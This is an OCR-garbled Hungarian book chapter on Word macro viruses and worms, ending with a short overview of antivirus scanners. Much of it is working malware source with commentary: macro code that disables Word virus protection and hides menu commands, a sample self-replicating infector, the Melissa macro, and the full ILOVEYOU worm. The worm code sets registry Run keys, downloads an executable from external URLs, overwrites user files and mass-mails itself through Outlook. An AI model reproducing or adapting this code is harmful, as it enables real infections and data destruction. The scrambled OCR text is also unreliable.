. Controls("Templates and Add-lns.. menj a Payloadra. Ezen a helyen a ritkán használt parancsok elrejtése a Word 2000-ben különösen végzetesen hat: a felhasználó e beállítás miatt egyáltalán nem vesz észre bizonyos beavatkozási lehetőségeket.Controls(''Macro"). Ha a szám és a változó megegyeznek. és sokkal tovább marad észrevétlen. akkor következik be az esemény: x=Int(Rnd * 100) 'X egy változó.SaveNormalPrompt = False Ezzel a paranccsal kikapcsolja a párbeszédablakot. Sub FileTemplates( ) On Error Ressume Next End Sub A felhasználó nem tudja elindítani a Sablonok és bővítmények ablakot. a hiányát csak az veszi észre. ami megvalósítható néhány programsorral. Természetesen a rendszeres összehasonlítás egy véletlenszámmal is lehetséges. Options.dot-ot. ha nem lehet a menükből elindítani a megfelelő funkciókat. hogy a makrovírust elrejtjük. a következő paranccsal lehet kikapcsolni a Registry-ből. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január L.5 Ilyet is lehet: a vírus egy Payload-ot hív meg Hogy a vírus ne legyen azonnal aktív.DisableAutoMacros = 0 End Sub Az automakrók inaktívvá válnak.. amely egy 0-100 közti számot tartalmaz. akkor menj a payloadra. A megfelelő kódsorok egyszerű If lekérdezések. System. A fertőzésszámláló pontosan ezt a lehetőséget kínálja. A vírus eltávolítja ezeket a bejegyzéseket. CommandBars("Tools"). If x = 3 then Call Payload 'Ha x. akkor menj a Payloadra. Sub WordBasic. Fontos még: mivel ennek a funkciónak a kikapcsolása a háttérben történik.dot mentésére.Delete Kiveszi a sablonokra és a bővítményekre vonatkozó menüparancsokat. amely alapértelmezésben rákérdez a Normal. 5. Sub ToolsMacro( ) On Error Resume Next End Sub Ha a felhasználó az Eszközök/Makró/Makrók-ra. lefut ez a sub. "). .Delete Kiveszi a makrókra vonatkozó menüparancsokat. hogy azt a felhasználó észrevenné. aki jól kiismeri magát a Wordben. Options.Controls(''Style. azután nullánál megtörténik a gonoszkodás. SubViewVBCode( ) On Error Resume Next End Sub A felhasználó nem tudja elindítani a VB editort.Delete * Kiveszi a stílusokra vonatkozó menüparancsokat. A Word kérdését.. CommandBars(''Format")."HKEY_CURRENT_USER\Software\ Microsoft\Office\9. Ugyanígy egy bizonyos napot is lehet használni.5.0\\Word\SecTírity". hogy a makrókat lefuttassa-e. CommandBars(''Tools"). A felhasználó nem láthatja a párbeszédmezőt. Ehhez el kell helyezni egy kulcsot valahol a Registry-ben.tehát azt jelentené..PrivateProfileString("". kattint. "). Ez úgy megy a legegyszerűbben. így anélkül lehet megváltoztatni a Normal. A rejtőzködéshez bizonyos menüparancsok kikapcsolása is fontos. If Month(Now( )) = l And Day(Now( ) = l Then Call Payload 'Ha az aktuális dátum január 2. „Levél") = /& A Programhiba esetén az On Error Resume Next -tel egyszerűen továbbfut. egy folyamatellenőrzési lehetőséggel is fel van ruházva. VirusProtection = False Eltávolítja a vírusvédelmet. amelyekkel a Word a dokumentumokban előforduló makrókra reagál.

A vírusvizsgálónk legyen mindig a legfrissebb.MatchWholeWord = True . "). egyes vírusprogramozók sportot űznek abból. 5. Például megváltozhatnának a dokumentum-tulajdonságok: hirtelen egy Dagobert kacsa írta a levelet vagy ilyesmi: Sub Payload( ) ActiveDocument. A kedvelt Keresés-Csere funkció most a vírust segíti: Sub Payload( ) On Error Resume Next Selection. és használjuk minden alkalommal.").Comments = "Megjegyzések" . Százszázalékos védelem nem létezik. és ezt a sztringet illesztik be egy másik osztálymodulba.Forward = True .Keywords = "Keresőszó" .5.Find.Saved = False Then ActiveDocument.Password = "hallo" 'Persze lehet véletlenszerű jelszót is csinálni.Find:ExecuteReplace:=wdReplaceAll CommandBars("edit").Controls("UndoVBA-Find. úgy találja meg ezt a párbeszédablakot. vagyis egy objektumot definiálunk tulajdonságokkal és eljárásokkal.Text = "Mire cseréli" 'amire cseréli .Author = "Szerző" .6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg A Payload mögött különféle ténykedések rejtőzhetnek.Title="Cím" .Save End Sub 5.Replacement. mint a vezérlőelemek.ReadOnlyRecommended = False With Dialogs(wdDialogFileSummaryInfo) . End Sub Ezentúl biztosan másképpen fogják kezelni a Word-figyelmeztetést. hogy kvázi „láthatatlanok".Delete CommandBars(''edit").MatchAllWirdForms = False End With Selection. amelyeknek magunk írhatjuk a forráskódját. Aki szeretne utánanézni.6 Megfertőzött osztálymodulok A WinWord dokumentumok megfertőzésének egy másik módja az osztálymodulok megfertőzése. Az osztálymodulok ezért ugyanazokkal a tulajdonságokkal rendelkeznek.Controls("Repeat" Replace.HomeKey Unit:=wdStory Selection.Find .Subject = "Tárgy" . mint az eddig bemutatott makróvírusoké: itt már nem exportálnak és importálnak egy kódot minden jövendőbeli Word fájlba. hogy mindig új fertőzési módokat találjanak ki.Format = False . A víruskód . Az osztálymodulok abban különböznek a felhasználó által meghatározott vezérlőelemektől.. amelyeket az időzített kioldó vált ki. vállalva a felfedezés veszélyét.MatchCase = False .ClearFormatting With Selectíon.Controls("Replace. Az osztálymodulok a felhasználó számára nem olyan könnyen felismerhetők.7 A vírus jelszóval védi a fájlt A jelszavas védelmet is be lehet kapcsolni egy makrovírussal: Sub Payload( ) ActiveDocument. ha kapunk egy Word vagy Excel dokumentumot.Wrap = wdFindContinue .Delete If ActiveDociment.Execute").Execute End With End Sub Ugyanígy szavakat is kicserélhetünk Word parancsok segítségével.Delete CommandBars("edit").5. ami sokkal nehezebbé teszi a vírus felfedezését.5. Az osztálymodulok megfertőzésének a stratégiája más.Replacement. de hatékony megelőzés azért lehetséges... Az osztálymodulok bizonyos mértékig saját meghatározású vezérlőelemek. hanem beolvassák a kódot.Text = "Mit keres" 'a cserélendő szöveg . Sajnos.. ha az Eszközök/Makró/Makrók Szervezőre kattint. mert a makrókhoz és sablontartalmakhoz tartozó Makró és a Szervező ablakban nem mutatja őket a program.

hogy a SUB Priváté.VBComponents(1). abból azután már logikusan következik. ezt az új felülírja. Egy osztálymodulban mindennek ' Private-nak kell lennie.dot-ban lehet. ' Az l. Így ez csak elpazarolt processzoridő. Az 1. hogy Source. CodeModule ' Az indexszám l a VBComponents(l)-nél mindig a „ThisDocument" osztálymodul.dot-ban vagyunk. már csak egy lehetőség marad hátra Set Source = ActiveDocument.' Ezzel biztosak lehetünk abban. . VBProject.Name ' Mivel nem tudjuk. On Error Resume Next ' a szokásos történet a hibával MyPos = ThisDoaiment. anélkül.CodeModule Set Target = NormalTemplate.CountOflines) ' Most a teljes víruskód a VirCode-ba lesz beolvasva.Lines(az l.DeleteLines l.dot-ban vagy a dokumentumban) 'a ThisDocument.Name adja a választ If MyPos = „Normal.megnyitáskor láthatatlanul integrálódik minden további dokumentumba. Ha a vírus ott már . hogy már az aktuális dokumentum is ' fertőzött. hogy hol vagyunk. ' Source. End With Egy igazi vírus persze sokkal nagyobb ennél. Else ' ha nem a Normal.. . hogy ott már semmi sincs. hogy az aktuális dokumentumot kell ' megfertőzni.. amelyek előzőleg ott voltak.CodeModule End If With Source VirCode = . sortól kezdve. amilyen hosszú a modul. ha egy dokumentumot megnyitnak. és csak a dokumentumban vagy a Normal. Source. . A kód beolvasásához tehát ki kell találni.' megtalálható lenne. VirCode ' A beolvasott sztring beillesztése a modulba.. és hogy a víruskód a Normal..CountOflines) End With ' Ha egy objektumot egy With. A programozás stuktúrájához egyszerűen azt kell elképzelni.dot-ból jön. és beírjuk a modulba.. amilyen hosszú a modul). VBProject. ' Figyelembe kell venni.End With-blokkba zárunk.. és még Stealth-funkciókat is tartalmaz.' annyi sort kell törölni. hogy a vírus végrehajtódik. With Target . sortól beolvasni.. . ' Tehát ott van. hogy mit kell megfertőzni. akkor nincs szükség ' az objektumnév ismétlésére. Most Document_Open( ) a neve.. VBProject. és VirCode a sztring. Private Sub Document_Open( ) ' Ez a Sub mindig lefut.CodeModule 'Ha a Normal. nem pedig ' AutoOpen( ).VBProject. VBComponents(1). kommentárokkal a kódban. ' hogy ha ott egy másik vírus volt. Ha ezt valaki elfelejti. Ezt ebben a példában nem ellenőrizzük. annyi sort...InsetLines l.CodeModule Set Target = ActiveDocument.VBComponents(l). VBComponents(l). hogy világossá tegye a mögötte rejlő meggondolásokat. törölve ' lesznek.dot" Then Set Source = NormalTemplate. tudjuk. ' Létrehozzuk a változóinkat. hogy előzőleg törölnénk ' a sorokat. De lehetséges.Lines(l. annak fertőzésnél azonnal hibát jelez.. ' . ' mert minden kód megfertőzésénél azok. ' A Sub neve is megváltozott. ' ActiveDocument. íme egy példavírus. .Lines(l.VBComponents( l). ' amelyet meg kell fertőzni. sortól kezdve.CountOflines ' A megfertőzendő fájlban minden sort törölni kell.CountOflines adja vissza a sorok/Lines számát a modulban.dot-ban vagyunk. . hol vagyunk (a Normal. Ez azonban azt is jelenti. az hibaüzenethez vezetne.VBProject.

Most minden idők egyik legveszélyesebb vírusát fogjuk alaposabban szemügyre venni.Item(l) 'Állítsd SetNTIl-et NormalTemplate. VBProject. 1) = "" NTIl.CodeModule.FullName Elself (InStr(l. ActiveDocumentName. "Document") = False) Then ActiveDocument. A LoveLettert először 2000.Lines(1. mellékletként.CodeMOdule.SaveAsFileName:=ActiveDocument. VBComponents.Lines(BGN.DeleteLines l. 1) <> "" ToInfect.CodeModule.Lines(BGN.CodeModule. 1) <> "" ToInfectCodeModule.Lines(BGN. ActiveDocumentName. ADIl.DeleteLines l Loop ToInfect.CodeModule.VBComponents.NTIl.7 ILOVEYOU A LoveLetter egy VBS-féreg (Vimal Basic Script) amely e-mailen keresztül terjed.DeleteLines l.CodeModule. 1) ="" ADIl. 1) BGN = BGN +l Loop If NTCL <> 0 And ADCL = 0 And (InStr(l.Lines(1.CodeModule.VBProject.VBComponents. Set NTI1 NormalTemplate.VBComponents.AddFromString ("Private Sub Document_Close( )") End If CYA: Do While ADIl.CountOfLims ADCL = ADIl.AddFromString ("Private Sub Document_Open( )") Do While NTIl.CodeModule.Lines Loop ToInfect.CodeModule.InsertLines EGN.CodeModule.CodeModule.Item(l)-re.VBProject.Az alábbiakban egy példával világítjuk meg.VBProject.Saved = True End If End Sub CUT HERE 5. NTCL = Hni.CodeModule. hogyan fertőzi meg az osztálymodulatokat a Melissa: CUT HERE Priváté Sub Document_Open( ) On Error Resume Next Set ASI1 = ActiveDocument.CodeModule. . „Document") <> False) Then ActiveDocument. május 4-én jelezték.CountOfLines BGN =2 If ADILName <> "Melissa" Then IfADCL>OThen_ ADIl. Néhány órán belül világszerte elterjedt.Item(l) 'Állítsd ADIl-et ActiveDocument. és a hálóra csatlakoztatott cégek 90% -át megfertőzte.Lines(BGN.Item(l) -re. 1) BGN = BGN + l Loop End If If DoAD = True Then Do While NTIl.InsertLines BGN. ADCL SetToInfect = ADIl ADILName = "Melissa" DoAD = True End If If NTILName <> "Melissa" Then If NTCL >0 Then _ NTIl.CodeModule.CodeModide-. NTCL SetToInfect = NTIl NTILName = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do WhileADIl.

600 ezer számítógépet ért el. mivel a Fülöp-szigetek-i szolgáltató. és ezután a cache-elt jelszavakat elküldte mailben. Yeah another time to DEATH. . vagy a gépet is rögtön kilőni! A féregnek egy variánsa aktiválta a jelszó cache-elést. és törölte a webhelyet. amely magától terjed az interneten vagy a helyi hálózaton keresztül. amelyek között ott volt a fertőzött is. amelyeket azonban hamarosan nem lehetett elérni. .. .. a Sky Internet Inc. ezzel az üzenettel: Bárok. Időközben a hackereknek volt idejük. .passwords.7. hogy egy csatorna minden látogatója.1 Mi az a féreg? A féreg egy darabkányi kód.css.jse. Sok cég megelőzésképpen leválasztotta mailszerverét a netről. Ebben az esetben gyorsan be kellett zárni ezt a feladatot. automatikusan elküldte magát a címjegyzék e-mailcímeire. s ez az érintett szerverek tisztán materiális kiesési ideje. míg a hatóságok napokon át semmit sem tettek..ini fájlját. és ezeket Access Net accountokra kellett volna küldenie.e. A féreg. mint az ILOVEYOU esetében. • LOOK! • How to protect yourself from the ILOVEYOU bug! Az Amable Mendoza Aguila Computer College-ben. Úgy módosította a mIRC script. gyorsan kapcsolt. Miközben a féreg aktív volt.er.2 A működési mód Az ILOVEYOU féreg egy weboldalról töltött le egyes bannereket.jpeg. a rendszergazdák félelmeit és feldühítését még egyáltalán nem számoltuk. A féreg.hta.5. A károkat több milliárd dollárra becsülték. hogy részt vettek a Bárok 2.. A féreg az Outlookon és a mIRC-en keresztül is terjedt.vbs fájlt.sct. a nem hivatalos számok azonban ennél jóval magasabbak. amely jelszavakat kémlel ki. . megkapta a . Így nagy forgalom keletkezett a cégek belső hálózati mailszerverein. mivel ezekbe a statisztikákba nem kerülnek be a magánfelhasználók gépei. illetve elrejtette az .trajan-by spyder. Ugyanott a féreg a WIN-BUGSFIX programot is le akarta tölteni. Két prominens áldozat is volt: a ZDF tévéadó és az Expo-világkiállítás. .mail. . A vírussal ellentétben a féreg nem közvetlenül rombol. A legdestruktívabb azonban az a tény volt.mp2 fájlokat. A féreg manipulálta még a következő Registry-bejegyzéseket: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \MSKernel32 HKEY_LOCAL_MACHINE\Sofrware\Microsoft\Windows\CurrentVersion\Run Services\Win32DLL HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \WN-BUGSFIX Miután lefuttatták.wsh.vbs. a Taskmanager-en is megjelent mint w_srcipt..7. Az eddig ismert változatok: • ILOVEYOU • Susitikim shi vakara kavos puodukui. hivatalos számok szerint. aminek következtében néhány céges hálózatnak teljes egészében le kellett mondania a mailküldésről.mp3 és az .send. . • Joke • Mothers Day Order Confirmation • Dangerous Virus Warning • Vírus ALERT!!! • Important! Read carefully!! • I Cant Believe This!!! • Thank You For Flying With Arab Airlines • Variant Test • Yeah.. legfeljebb magas forgalmat (traffic) generál. hogy minden js. 5. hogy minden döntő bizonyítékot töröljenek a gépeikről.jpg fájlt használhatatlanná tett.1 szoftver fejlesztésében.. . a Spyder nevet használó hacker munkahelyén 10 személyt gyanúsítottak azzal.

Philippines Ezek a sorok csak szerzői kommentárok.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT. nemhogy egy analízis háttérinformációkkal a felhasználók számára. és a Registry-bejegyzések eltávolítása.COM fájlok jelenthetnek veszélyt.Regread(''HKEY_CURRENT_USER\Software\Microsoft\Windows ScriptingHost\Settings\Timeout") if (rr>=l) then wscr. Copy(dirsystem& "\MSKernel32. tehát a szerző mailcíme és álneve.ReadAH A program ezután egy FileSystemObject-et (fso) hoz létre.3 Hogyan tudott a féreg elterjedni? A féreg terjedésének az alapja az volt. akkor a következő lépéssel kell folytatni. hogy ActiveX-kontrollok és más scriptek is veszélyesek lehetnek.4 A forrás . nem tudatosulnak a hálóval kapcsolatos veszélyek.rr setivscr=CreateObject("Wscript. 1) vbscopy=file. Sokan azt hitték. 5. rem barok -loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.dow eq="" ctr=0 . akiknek a részvényei 10%-kal is emelkedtek.ctr. Ennek a féregnek semmi esélye sem lett volna.vbs fájlok törlése a Windows és a Windows/System könyvtárból.dirtemp.GetSpecialFolder(0) Set dirsystem =fso. Ellenintézkedésként ajánlkozik a WindowsScripting hostok eltávolítása uninstall-lal. hogy csak a végrehajtható fájlok. de sehol nem jelent meg róla még felvilágosítás. Ezzel az objektummal lehet fájlokat elérni.vbs") regruns( ) html( ) spreadtoemail( ) listadriv( ) end sub 5.vbs") c.EXE vagy a . főleg az internetes újoncokban.GetSpecialFolder(2) Set c =fso.Shell") rr=scr. On Error Resume Next dimFSO. main( ) sub main( ) On Error Resume Next dim Tvscr. valamint a *. ScriptFullname.kommentárokkal A továbbiakban az ILOVEYOU vírus forráskódja látható. hogy ebben a formájában teljesen hatástalan. Az ILOVEYOU vírus téma a múltban nagyon gyakran szerepelt a médiában.7. Az.vbs") c.file.dirwin. "REG_DWORD" end if Set dirwin = fso. A célja csak a felépítés bemutatása és kommentálása sorról sorra.eq.Copy(dirwin& "\Win32DLL. A vírus a Windows Scripting Host-tal hajtódik végre.FileSystemObject") set file = f s o . hibaüzenet nélkül. még nem ismert általánosan.dirsystem.vbscopy. A következő sorban ez meg is történik: a program az OpenTextFile-lal és az azután következő ReadAll( ) -lal beolvassa magát a memóriába. a vírus működésére nincs semmilyen hatásuk.GetFile(Wscript.ScriptFullName) c.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout".0. mint az . Ezután definiál néhány változót.GetSpecialFolder(l) Set dirtemp = fso. de hangsúlyozzuk. Open TextFile (Wscript. Az On Error Resume Next-tel a hibakezelést vezeti be: ha a program futtatása közben hiba lép fel.7. ha minden végfelhasználó tudott volna a Visual Basic Script veszélyeiről. Set so = CreateObject("Scripting.com / ©GRAMMERSoft Group / Manila. hogy manapság.Az eset egyedüli nyertesei az antivírusok gyártói voltak. ezekkel a változókkal fog a későbbiekben dolgozni.

Mikor a vírus így bemásolta magát. A többi funkciót a forrásszöveg folyamatában magyarázzuk el. a működési módjukkal együtt. Page". sub regruns( ) On Error Resume Next Dim num.net/ ~angelcat/skladjflfdjghKJnmtryDGFikjUlyqwrWe546786324hjk4jnHH GbvbmKL/ JKjhkqj3w/ WIN-BUGSFIX. "http://www. A html( ) egy helyi HTML-fájlt helyez el.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run \ WIN-BUGSFIX".vbs. ami később meg is történik.exe" elseif num = 3 then regcreate "HKCU\Sofrivare\Microsoft\InternetExplorer\Main\Sart Page".skyinet. valamint a Windows/System (dirsystem) könyvtárat. hozzákezd az igazi feladatához. Először a CreateObject( ) -tel egy Shell objektumot hoz létre .exe end if end if if (fileexist(dovmread&"\WIN-BUGSFIX. net/ ~yotmg l s/HJKjnwerhjkxcvytwertnMTFwerdsfmhPnjw6581345gvsdfl619njbvYT/ WIN-BUGSFIX. A Set parancsokkal kérdezi le a program a Windows könyvtárait (dirwin).downread regcreate "HKEY__LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \Run \MsKernel32 ". Win32DLL.dirwin8í "\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\ Internet Explorer\Download Directory") if (downread="") then downread="c:" en if if<fíleexist(dirsystem&"\WinFAT32. A CurrentVersion/Run alatt két kulcsot hoz létre.skyinet. Ezek a fájlok tehát kizárólag a vírust tartalmazzák.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main \Sart "about:blank" end if end sub A regruns( ) funkciónak különböző feladatai vannak a Registry-ben. amely valójában még egyszer tartalmazza a vírust. MSKernel és Win32DLL név alatt. html( ). mindkettő a vírus előzőleg létrehozott másolatára mutat.dirsystem&"\MSKernel32.exe")=l) then Randomize num = Int((4 * Rnd) +1 if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". "http://www. . amihez a következő függvényeket hívja meg: regruns( ).skyinet.skyinet.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page ". "http://www.downread& "\WIN-BUGSFIX.ez az objektum teszi lehetővé a Windows különböző funkcióinak az elérését.Innentől kezdődik a vírus főrutinja. "http://www. és ezt indításkor végrehajtja.net/ ~koichi/jf6TrjkcbGRpGqaql98vbFV5hfFEjbopBdQZnmpOhfgER61b3Vlrvg/ WN-BUGSFIX. hogy azután a maga egyik másolatát tegye le a következő neveken: MSKernel32. illetve LOVE-LETTER-FOR-YOU. net/~chu/ sdgfhjksdfiklNBmnfgkKLHjkq'wtiiHJBhAFSDGjkhYUgq'werasdjh PhjasfdglkNBhbq'webmznxcbvnmadshfgq'w23146I234iiiylthjg/ WIN-BUGSFIX. és írni lehet bele.vbs. spreadtoemail( ) és listadriv( ).exe elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Sart Page".vbs.TXT. Ki lehet például olvasni a Registry-t.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion \RunServices\Win32DLL ".

path. GetExtensionName (f1 .close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (Ext="sct") or (ext="hta") then set ap=fso. Röviddel az ILOVEYOU megjelenése után azonban a skyinet. GetFolder(folderspec) set sf=f. úgy.GetBaseName (f1.path) cop. bname.write vbscopy ap. GetFolder(folderspec) set fc =f. f1. fc.true) ap. hogy a következő rendszerindításkor a vírus ismét elindul. f1. s.net egyik szerverére vezet.OpenTextFile(f0).path) next end sub .dc. Erről az oldalról azután még egy további fájlt is automatikusan letölt a vírus.path&". Most a program megváltoztatja az Internet Explorer kezdőlapját.A Run alatti bejegyzések a Windows indításakor automatikusan lefutnak.Drives For Each d in de If d.path) cop.DriveType = 2 or d. OpenTextFile(f1.vbs") mp3.path.DriveType=3 Then folderlist(d.write vbscopy mp3. amelyet meg fog fertőzni: sub infectfiles(folderspec) On Error Resume Next dim f. tehát azt a könyvtárat.path) elseif(ext="mp3" ) or (ext="mp2") then setmp3=fso. true) ap.close bname=fso. Ezután a vírus az Internet cache-t keresi. ez a fájl megintcsak bejegyzi magát a Registry-be.FetFile(f1. ap. 2. Minden oldal a skyinet. amelyek közül véletlenszerűen választ ki egyet.vbs") fso. sub listadriv On Error Resume Next Dim d. 2. az majd később következik. amely a meghajtókon található minden mappát megdolgozza.DeleteFile(f( ).path) elseif(ext="jpg") or (ext="jpegn) then set ap=fso.path) ext=Icase(ext) s=Icase(f( ). s hogy pontosan mit is tesz.s Set dc =fso. mp3 set f=fso.net lépett.vbs") fso. hogy a következő Windows-indításnál végrehajtódik.path&".close dim f.Files for each f1 in fc ext=fso. és újból kezdi a működését. és eltávolította a szerverről a megfelelő oldalakat.path. sf for each f1 in sf set f=fso.close set cop=fso.DeleteFile(f1.copy(folderspec& ""&bname& ". s támogatja a vírus működését.SubFolders infectfiles(f1. Ez azt jelenti.path) set cop=fso. egyszerűen a C:-t használja. Ha a vírus nem talál cache-t. Minden fájlt felsorol. true) ap. ehhez négy különböző oldal szolgál választékul. ext.write vbscopy ap.2.CreateTextFile(f1.copy(f1. mircfname.name) if (ext="vbs") or (ext="vbe") then set ap=fso.write vbscopy ap.GetFile(f0. sub folderlist(folderspec) On Error Resume Next Minden mappán végrehajtja az InfectFiles funkciót. amelybe a megfelelő fájlokat tölti az Internet Explorer. Ez a funkció a mappák egyes fájljait szerkeszti.patb&"") end if Next listadriv = s end sub Ez a függvény minden meghajtót kilistáz. és ezután meghívja a folderlist függvényt.path) folderlist(f1.OpenTextFile(f1.

WriteLine ".WriteLine ".ini-t.close eq=folderspec end if end if next end sub Az InfectFiles -nak két feladata van. amelyeket a program más pontjain használ fel.WriteLine "n0=on 1:JOIN:#:{„ script.exe") or (s="mirc.ini.WriteLine " n 1 = / i f ( = = ) {halt}" script. és a saját magáról készített másolattal írja felül ezeket.FileExist(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if ( f s o .ini.mIRCScript" script. Ez a script.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.ini. hogy léteznek-e bizonyos fájlok vagy mappák.b.regad .WriteLine "n3=}" script. Please dont edit this script.HTM" script. GetFolderExist(folderspec)) then msg = 0 else msg = l end if fileexist = msg end funrtion sub spreadtoemail( ) On Error Resume Next dimx..ini") script. 1.WriteLine ".RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.set att=fso.regedit. akkor felülírja a script. Ha talál egy mIRC-et (Chat Scriptet).ini.ini. Megkeres minden.WriteLine ".css stb. thanks" script. A következő függvények segédfüggvények.. hogy egy LOVE_LETTER_FOR_ YOU.. com " script.ini.attrihites=att.regv.http://www." script.ini.regualue) Set regedit = CreateObject("Wscript. ugyancsak a vírust terjeszti úgy.wsh.Shell") regget=regedit. . Ezek a függvények egy Registry-bejegyzést készítenek..hlp") then set scriptini=fso. sub regcreate(regkey.WriteLine "." script. WINDOWS will affect and will not run correctly. if mIRCwill" script.WriteLine "n2= /.regvalue end sub function regget(value) Set regedit = CreateObject("Wscript.ctrentries.ini") or (s="mirc.HTM nevű fájlt küld a csatorna minden felhasználójának.ini.exe") or (s="mlink32. ha lefut. és ellenőrzik. 2.WriteLine "[script] script.Shell") regedit. .KhaledMardam-Bey" script. WriteLine ".RegWrite regkey.ini") or (s="script.ini. mirc.ini.ini.path) att.dcc send "&dirsystem&\LOVE_LETTER_FOR_YOU. mIRC will corrupt. WriteLine " corrupt. megadott kiterjesztésű (.ctrlists.a.js.malead.GetFik(f1.ini.) fájlt.ini.CreateTextFile(folderspec& "\script.

Recipients. többnyire csekély. mint a normál víruskeresésnél.Sheir) set out=WScript. 5.a.AddressLists. 1. csak különböző script-fáljokat írt át. CreateObject("Outlook. GetNameSpace("MAPI") for ctrlists=1 ro mapi.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&:a. A szkennermodul a vírusok sztringjeit és viselkedési módját is felismeri.setregedit=CreateObject("Wscript.AddressEntries(x) regad="" regad=regedit. hogy megállapítsa a víruskódokkal való egyezést.a feldolgozhatatlan mennyiségű e-mail miatt milliós volt. Az eljárás neve Pattern Matching.Attachments." male.AddressEntries. "REG_DWORD" endif x=x+l next regedit. . vbs") male. illetve mailszolgáltatók kára viszont . és ezzel potenciálisan olyan vírusokat is leleplezhet. Ez a program tulajdonképpeni terjedési módja: lefut.RegRead(''HKEY_CURRENT_USER\Software\Microsoft\ WAB"&a) if(regv="") then regv=l end if if (int(a. ehhez a szoftver gyártói saját víruslaborokat tartanak fenn.1 Szkennermodul A szkennermodul a vírusok felkutatásáért felelős a merevlemezen.Subject = "ILOVEYOU" male. amelyben a Windows minden mailcímet tárol. A szkenner ellenőrzi egy fájl vagy egy program kódját. A kár.Count malead=a. hogy azután a címjegyzékben talált minden címre elküldje a vírus másolatát. az ILOVEYOU. amelyek még nincsenek benne az adatbázisban. az egyszerűsége ellenére.Body =vbcrlf&"kindly check the attached LOVELETTER comingfrom me. 5.Application ") set mapi=out. A legtöbb vírusvizsgáló frissítésekkel folyamatosan bővíti az adatbázisát. és elküldi magát minden címre.RegWrite "HKEY_CURRENT_USER \Software \Microsoft\WAB"&malead.EXE). Ha a szkenner megváltoztatott kódot vagy valamilyen egyéb eltérést észlel.Createltem(0) male.Add(malead) male. hogy folyamatosan tudjanak reagálni az új fenyegetésekre.8. Count>inr(regv)) then for ctrentries=l to a.Send regedit. AddressEntries. Csak ezért tudott ennyire gyorsan elterjedni.AddressEntries. TXT. úgynevezett nyomozócsapatokat foglalkoztatnak.Add(dirsystem& "\LOVE-LETTER-FOR-YOU. tehát a címjegyzéket (WAB. amelyet a felhasználóknál hátrahagyott. Count endif next x=l Set out=Nothing Set mapi=Nothing end sub A SpreadToEmail( ) függvény megnyitja a programot. Az internet-. Amint látjuk.AddressLisets(ctrlists) regv=regedit. Az ilyen szkennelésnél a hibaszázalék magasabb. és látogatják az idevágó newsgroupokat.8 Hogyan működnek a vírusvizsgálók? A vírusvizsgáló egy adatbázist használ. amely minden felismerhető vírus nevét és lenyomatát tartalmazza.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB"&malead) if(regad="") then set male=out.Count set a=mapi. igazán komplex funkciókkal van felszerelve. amit talál. akkor ezt összehasonlítja az adatbázis lenyomataival.

hogy valós időben. azaz áthelyezi egy „karanténkönyvtárba". átnevezik vagy letöltik a hálóról. Úgy van beállítva. A hátránya.8.3 „Fertőtlenítő" Ha a szkenner vírust talál. hogy a vírusprogramtól függő mértékben visszafogja a rendszerteljesítményt.8. vagy feleslegesen bonyolult? . ez a modul lép akcióba. a háttérben működő szkenmodul. vagy elkülöníti. Vagy megtisztítja a fájlt a vírustól.8.5. 5. A következő szempontokra kell ügyelni: • A kínált programfrissítési gyakoriság (legjobb hetente egyszer) • Az ügyféltámogatás minősége • Szkennelési sebesség • Szkennelési minőség • Lehetséges-e a szkennelés a háttérben.2 Víruspajzs A víruspajzs egy memóriarezidens. Ha egy fájlt elindítanak. a víruspajzs azonnal megvizsgálja. hogy valamiképpen megtisztítsa. jelentést tesz. vagy törli a fájlt. hogy milyen nagy a fertőzés kockázata. vagy a szkennelés leállítja a rendszert? • Felismeri-e a program a vírusokat már letöltés közben? • Meg tudja-e találni a szoftver tömörített fájlokban is a vírusokat? • Tudja-e ellenőrizni az e-mailhez csatolt fájlokat (attachments) már az elindításuk előtt? A kezelése kényelmes.4 A vírusvédő program kiválasztásának a szempontjai Hogy mennyit akarunk vagy kell ráfordítanunk egy-egy virusvizsgálóra. ha nincs rá lehetősége. 5. kijelölnek. folyamatosan kövesse a felhasználók minden fájlelérését. az attól függ. és mennyibe kerülne az adatok újbóli előállítása. a fertőzéstől függően. különböző opciói vannak a vírus eltávolítására. és ha szükséges. Ennek a modulnak.

2.4 Fragmentált szkennelés 6.7 ICMP-echo-scanning/ping-szkennelés 6.1. fejezet .5 UDP-ICMP-Port-Unreachable szkennelés 6.2.3 TCP-FIN-Scan 6.2.6 UDP-Recvfrom-And-Write szkennelés 6.2.1 Szkenneles teljes TCP-kapcsolattal 6.2.8 A nyitott portok csak a kezdetet jelentik 6.2. 6. A szkenner Szkennelesi eljárások 6.2.2 Félig nyitott TCP-szkennelés 6.2.Tartalom 6.6.2.9 A portszkennelés elleni védelem .2.

